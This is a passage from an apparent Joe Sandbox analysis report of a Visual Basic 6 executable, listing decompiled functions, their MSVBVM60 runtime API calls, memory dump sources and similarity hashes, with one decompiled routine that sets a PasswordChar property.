                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004153C6
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004153DB
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000214), ref: 004153FA
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041540A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004012D0,0040F430,00000390), ref: 00415449
                                                                                • __vbaFreeObj.MSVBVM60(0041547B), ref: 00415473
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00415478
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Addref$CastErrorListSystem
                                                                                • String ID: Font
                                                                                • API String ID: 3738871781-1889970156
                                                                                • Opcode ID: 0722a3743ff76973780773f3fea71a056cfd66d1a76cb4db333142056a77aa4f
                                                                                • Instruction ID: 6bc4be87af2c07027715a9e2a2bd91cfb8959c292c7f498c447615085812a062
                                                                                • Opcode Fuzzy Hash: 0722a3743ff76973780773f3fea71a056cfd66d1a76cb4db333142056a77aa4f
                                                                                • Instruction Fuzzy Hash: 56412070900209AFCB04DF95D989EEEBBB8FF98701F10811AF545E7260D774A985CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004210B0, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00421108
                                                                                • __vbaNew.MSVBVM60(0040BC04), ref: 00421118
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00421123
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004113E8,00000020), ref: 00421148
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00421178
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411580,00000020), ref: 004211B2
                                                                                • __vbaCastObj.MSVBVM60(?,004113E8), ref: 004211C1
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004211CC
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004211D5
                                                                                • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 004211E9
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004211FA
                                                                                • __vbaFreeObj.MSVBVM60(00421246), ref: 00421236
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0042123F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$AddrefCheckHresult$CastCopyList
                                                                                • String ID: @
                                                                                • API String ID: 4087540898-3871860774
                                                                                • Opcode ID: 18d870e09c087d0de79326df0e36169bb7a567c4605603b1e849ecc6936ad90e
                                                                                • Instruction ID: b2c52fb0ff59e548289ddadc2256cc9f5d7e743dd723f6642b544e9356a26b3e
                                                                                • Opcode Fuzzy Hash: 18d870e09c087d0de79326df0e36169bb7a567c4605603b1e849ecc6936ad90e
                                                                                • Instruction Fuzzy Hash: D941F9B1D00209AFDB04DF95DA85AEEBBB8FF58700F20411AE616B72A0D7746A05CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420180, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCat.MSVBVM60(004117A4,<area,?,?,?,?,?,?,?,?,00401D26), ref: 004201D5
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201E2
                                                                                • __vbaStrCat.MSVBVM60(0040F42C,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 004201EA
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201F1
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201F6
                                                                                  • Part of subcall function 00424570: __vbaStrCopy.MSVBVM60(72A26A76,00401978,72A26C30), ref: 004245C2
                                                                                  • Part of subcall function 00424570: __vbaStrCopy.MSVBVM60 ref: 004245CA
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,?), ref: 004245E6
                                                                                  • Part of subcall function 00424570: __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?), ref: 004245EE
                                                                                  • Part of subcall function 00424570: __vbaFreeStr.MSVBVM60(?,?), ref: 00424600
                                                                                  • Part of subcall function 00424570: __vbaStrCmp.MSVBVM60(0040F38C,?,?,?), ref: 00424618
                                                                                  • Part of subcall function 00424570: __vbaLenBstr.MSVBVM60(00000000,?,?), ref: 00424629
                                                                                  • Part of subcall function 00424570: #616.MSVBVM60(?,-00000001,?,?), ref: 0042463C
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424647
                                                                                  • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(004117A4,00000000,?,-00000001,?,?), ref: 00424655
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042465C
                                                                                  • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 00424663
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042466A
                                                                                  • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(00411B14,00000000,?,-00000001,?,?), ref: 00424672
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424679
                                                                                  • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 0042468A
                                                                                  • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(00000000,?,-00000001,?,?), ref: 0042468D
                                                                                • __vbaStrCopy.MSVBVM60(href,00420DD4,?,coords,00080001,?,shape,rectangle,?,0040F3C8,00420F4F,?), ref: 0042026F
                                                                                • __vbaFreeStr.MSVBVM60(0042029F,?,?,?,?,?,?,?,?,00401D26), ref: 00420298
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Move$CopyFree$#616Bstr
                                                                                • String ID: <area$circle$coords$href$polygon$rectangle$shape
                                                                                • API String ID: 2048072741-4243157096
                                                                                • Opcode ID: 2494ec18348d9b55e87675e74de61997e1f958db62a68283ada1f942f2229400
                                                                                • Instruction ID: 37bbe1c646a04cea47341a5b02a1ee3a9c1d4317476bd568df87fefc4746acc8
                                                                                • Opcode Fuzzy Hash: 2494ec18348d9b55e87675e74de61997e1f958db62a68283ada1f942f2229400
                                                                                • Instruction Fuzzy Hash: C5315071A00219EFCB00DB95D945EFFF7F8EF94700B60806BA511A32A1D7786D05CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C250, Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041E590: __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041E5F9
                                                                                  • Part of subcall function 0041E590: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041E60E
                                                                                  • Part of subcall function 0041E590: __vbaObjSetAddref.MSVBVM60(?), ref: 0041E61B
                                                                                  • Part of subcall function 0041E590: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E646
                                                                                  • Part of subcall function 0041E590: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E65B
                                                                                  • Part of subcall function 0041E590: __vbaFreeVar.MSVBVM60 ref: 0041E667
                                                                                  • Part of subcall function 0041E590: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E691
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C2C6
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001E8), ref: 0041C2E9
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041C2F2
                                                                                • __vbaVarForInit.MSVBVM60(?,?,?,?,?,?), ref: 0041C335
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C351
                                                                                • __vbaI4Var.MSVBVM60(?), ref: 0041C378
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C38F
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C39C
                                                                                • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041C3CD
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041C3ED
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041C3F6
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041C3FF
                                                                                • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041C414
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$BoundsErrorGenerate$AddrefInitNew2NextRedimText
                                                                                • String ID:
                                                                                • API String ID: 3227237787-0
                                                                                • Opcode ID: 899f88996e62988197f70b28ac8fe2fba82cc2ea73305debac50e6c58d0c5806
                                                                                • Instruction ID: 8021d3ac604f1cd073d0d69ec38083b76a2f35fe1ad422b5f63be83236697dae
                                                                                • Opcode Fuzzy Hash: 899f88996e62988197f70b28ac8fe2fba82cc2ea73305debac50e6c58d0c5806
                                                                                • Instruction Fuzzy Hash: 55611EB1900249EFDB04DFA5DD88AEEFBB9FF58300F10415AE506A7260DB745985CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C490, Relevance: 24.2, APIs: 16, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041EF00: __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041EF69
                                                                                  • Part of subcall function 0041EF00: __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EF7E
                                                                                  • Part of subcall function 0041EF00: __vbaObjSetAddref.MSVBVM60(?), ref: 0041EF8B
                                                                                  • Part of subcall function 0041EF00: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EFB6
                                                                                  • Part of subcall function 0041EF00: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EFCB
                                                                                  • Part of subcall function 0041EF00: __vbaFreeVar.MSVBVM60 ref: 0041EFD7
                                                                                  • Part of subcall function 0041EF00: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F001
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C4FC
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001E8), ref: 0041C51F
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041C528
                                                                                • __vbaVarForInit.MSVBVM60(?,?,?,?,?,?), ref: 0041C56C
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C588
                                                                                • __vbaI4Var.MSVBVM60(?), ref: 0041C5AF
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C5C6
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C5D3
                                                                                • __vbaStrVarVal.MSVBVM60(?,00401D26), ref: 0041C604
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041C624
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041C62D
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041C636
                                                                                • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041C64B
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$BoundsErrorGenerate$AddrefInitNew2NextRedimText
                                                                                • String ID:
                                                                                • API String ID: 3227237787-0
                                                                                • Opcode ID: 21ef237a613bf7da8c69d732572fa9a2c50ea11843046ceb4d1ebfe4f7b7f9f3
                                                                                • Instruction ID: 783ad02440414d3d6f1bec500050ec52a1cc75d5921ed22cab52173475bd86b6
                                                                                • Opcode Fuzzy Hash: 21ef237a613bf7da8c69d732572fa9a2c50ea11843046ceb4d1ebfe4f7b7f9f3
                                                                                • Instruction Fuzzy Hash: E5512CB1900259EFDB14DFA4DD88AEEBBB9FF48300F108169E506E7250EB74A945CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423A30, Relevance: 21.2, APIs: 14, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,72A46AEE,00000000,?), ref: 00423AB9
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000048), ref: 00423AEC
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00423B08
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000048), ref: 00423B35
                                                                                • __vbaI4Str.MSVBVM60(?), ref: 00423B44
                                                                                • __vbaI4Str.MSVBVM60(?,00000000), ref: 00423B4E
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00423B76
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresultNew2$FreeList
                                                                                • String ID:
                                                                                • API String ID: 1549294082-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 0fe2451bce0b723a07b1f93d9cac36706b57eef32be5b28af73380462c7e1869
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 9D51F670740228ABDB208F15DE46FEAB778EF54702F404096FA08B7190D6BC5E85CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004187F0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 22%
                                                                                			E004187F0(void* __ebx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				short _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v92;
				intOrPtr _t59;
				intOrPtr* _t61;
				intOrPtr _t63;
				short _t65;
				void* _t93;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x18;
				 *[fs:0x0] = _t96;
				L00401D20();
				_v28 = _t96;
				_v24 = 0x401558;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t93);
				_v8 = 1;
				__imp____vbaStrCopy();
				_v8 = 2;
				__imp____vbaOnError(0xffffffff);
				_v8 = 3;
				__imp____vbaStrCopy();
				_v8 = 4;
				_t59 = _a4;
				if( *((intOrPtr*)(_t59 + 0x70)) != 0) {
					_v8 = 5;
					__imp____vbaLenBstr( *((intOrPtr*)(_a4 + 0x54)));
					if(_t59 == 0) {
						_v8 = 8;
						_v64 = 0;
						E0040F5DC();
						__imp____vbaSetSystemError( *((intOrPtr*)(_a4 + 0x70)), 0xcc, 0,  &_v64);
					} else {
						_v8 = 6;
						_t65 = _a4;
						__imp__#516( *((intOrPtr*)(_t65 + 0x54)));
						_v60 = _t65;
						_v64 = 0;
						E0040F5DC();
						__imp____vbaSetSystemError( *((intOrPtr*)(_a4 + 0x70)), 0xcc, _v60,  &_v64);
					}
				}
				_v8 = 0xb;
				_v48 = L"PasswordChar";
				_v56 = 8;
				L00401D20();
				_t61 = _t96;
				 *_t61 = _v56;
				 *((intOrPtr*)(_t61 + 4)) = _v52;
				 *(_t61 + 8) = _v48;
				 *((intOrPtr*)(_t61 + 0xc)) = _v44;
				_t63 =  *((intOrPtr*)( *_a4 + 0x390))(_a4);
				asm("fclex");
				_v68 = _t63;
				if(_v68 >= 0) {
					_v92 = 0;
				} else {
					_t63 = _a4;
					__imp____vbaHresultCheckObj(_v68, _t63, 0x40f430, 0x390);
					_v92 = _t63;
				}
				__imp____vbaFreeStr(0x41898f);
				return _t63;
			}
























                                                                                0x004187f3
                                                                                0x00418802
                                                                                0x0041880e
                                                                                0x00418816
                                                                                0x00418819
                                                                                0x00418820
                                                                                0x00418827
                                                                                0x00418837
                                                                                0x0041883a
                                                                                0x00418847
                                                                                0x0041884d
                                                                                0x00418856
                                                                                0x0041885c
                                                                                0x0041886c
                                                                                0x00418872
                                                                                0x00418879
                                                                                0x00418880
                                                                                0x00418886
                                                                                0x00418894
                                                                                0x0041889c
                                                                                0x004188df
                                                                                0x004188e6
                                                                                0x004188ff
                                                                                0x00418904
                                                                                0x0041889e
                                                                                0x0041889e
                                                                                0x004188a5
                                                                                0x004188ac
                                                                                0x004188b2
                                                                                0x004188b6
                                                                                0x004188d2
                                                                                0x004188d7
                                                                                0x004188d7
                                                                                0x0041889c
                                                                                0x0041890a
                                                                                0x00418911
                                                                                0x00418918
                                                                                0x00418924
                                                                                0x00418929
                                                                                0x0041892e
                                                                                0x00418933
                                                                                0x00418939
                                                                                0x0041893f
                                                                                0x0041894b
                                                                                0x00418951
                                                                                0x00418953
                                                                                0x0041895a
                                                                                0x00418979
                                                                                0x0041895c
                                                                                0x00418966
                                                                                0x0041896e
                                                                                0x00418974
                                                                                0x00418974
                                                                                0x00418988
                                                                                0x0041898e

                                                                                APIs
                                                                                • __vbaChkstk.MSVBVM60(?,00401D26), ref: 0041880E
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401D26), ref: 00418847
                                                                                • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401D26), ref: 00418856
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401D26), ref: 0041886C
                                                                                • __vbaLenBstr.MSVBVM60(?), ref: 00418894
                                                                                • #516.MSVBVM60(?), ref: 004188AC
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,000000CC,?,00000000), ref: 004188D7
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,000000CC,00000000,00000000), ref: 00418904
                                                                                • __vbaChkstk.MSVBVM60 ref: 00418924
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F430,00000390), ref: 0041896E
                                                                                • __vbaFreeStr.MSVBVM60(0041898F), ref: 00418988
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Error$ChkstkCopySystem$#516BstrCheckFreeHresult
                                                                                • String ID: PasswordChar
                                                                                • API String ID: 767474922-4263504495
                                                                                • Opcode ID: 17ca0a96e64a1b5c62d453681d4e3af68561ba07f5b18bf80779097b4e8d2918
                                                                                • Instruction ID: 779765b95c1925624557bf2a055067721e34559cc8402dc6b104e5801139ceda
                                                                                • Opcode Fuzzy Hash: 17ca0a96e64a1b5c62d453681d4e3af68561ba07f5b18bf80779097b4e8d2918
                                                                                • Instruction Fuzzy Hash: DA51C6B4900208EFDB04DF94C988BEEBBB5FF48704F108169E515AB3A0CB799A45CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041DC50, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041DB10: __vbaNew2.MSVBVM60(0040B730,00000000,00000000,00000000,?), ref: 0041DB5C
                                                                                  • Part of subcall function 0041DB10: __vbaObjSetAddref.MSVBVM60(?,?,00000000,00000000,?), ref: 0041DB69
                                                                                  • Part of subcall function 0041DB10: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DB94
                                                                                  • Part of subcall function 0041DB10: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DBA1
                                                                                  • Part of subcall function 0041DB10: __vbaFreeVar.MSVBVM60 ref: 0041DBAC
                                                                                  • Part of subcall function 0041DB10: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DBE1
                                                                                  • Part of subcall function 0041DB10: __vbaObjSet.MSVBVM60(?,?), ref: 0041DBEE
                                                                                  • Part of subcall function 0041DB10: __vbaFreeObj.MSVBVM60(0041DC27), ref: 0041DC20
                                                                                • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041DCB9
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DCCE
                                                                                • __vbaObjSetAddref.MSVBVM60(?), ref: 0041DCDB
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DD06
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DD1B
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DD27
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DD51
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041DD74
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041DD81
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041DD94
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DD9D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DDC7
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041DDDC
                                                                                • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041DDEC
                                                                                • __vbaFreeObj.MSVBVM60(0041DE20), ref: 0041DE19
                                                                                • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041DE36
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                                                • String ID:
                                                                                • API String ID: 504347678-0
                                                                                • Opcode ID: 48e808211b2ece66a89fc9500f0560853026e4968efcd41fec2109b93d23f16d
                                                                                • Instruction ID: 854498418e14e9ee3c0fc25b9085136d71577cca2ed3780dbbf1bf8355da2cb2
                                                                                • Opcode Fuzzy Hash: 48e808211b2ece66a89fc9500f0560853026e4968efcd41fec2109b93d23f16d
                                                                                • Instruction Fuzzy Hash: BB5171B0E00219AFDB14DFA4DD88EEEB7B9FF88705F008119F555AB2A0D7789845CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E590, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041E450: __vbaNew2.MSVBVM60(0040B730,?,00000000,?,00401668), ref: 0041E49C
                                                                                  • Part of subcall function 0041E450: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,00401668), ref: 0041E4A9
                                                                                  • Part of subcall function 0041E450: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E4D4
                                                                                  • Part of subcall function 0041E450: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E4E1
                                                                                  • Part of subcall function 0041E450: __vbaFreeVar.MSVBVM60 ref: 0041E4EC
                                                                                  • Part of subcall function 0041E450: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E521
                                                                                  • Part of subcall function 0041E450: __vbaObjSet.MSVBVM60(?,?), ref: 0041E52E
                                                                                  • Part of subcall function 0041E450: __vbaFreeObj.MSVBVM60(0041E567), ref: 0041E560
                                                                                • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041E5F9
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041E60E
                                                                                • __vbaObjSetAddref.MSVBVM60(?), ref: 0041E61B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E646
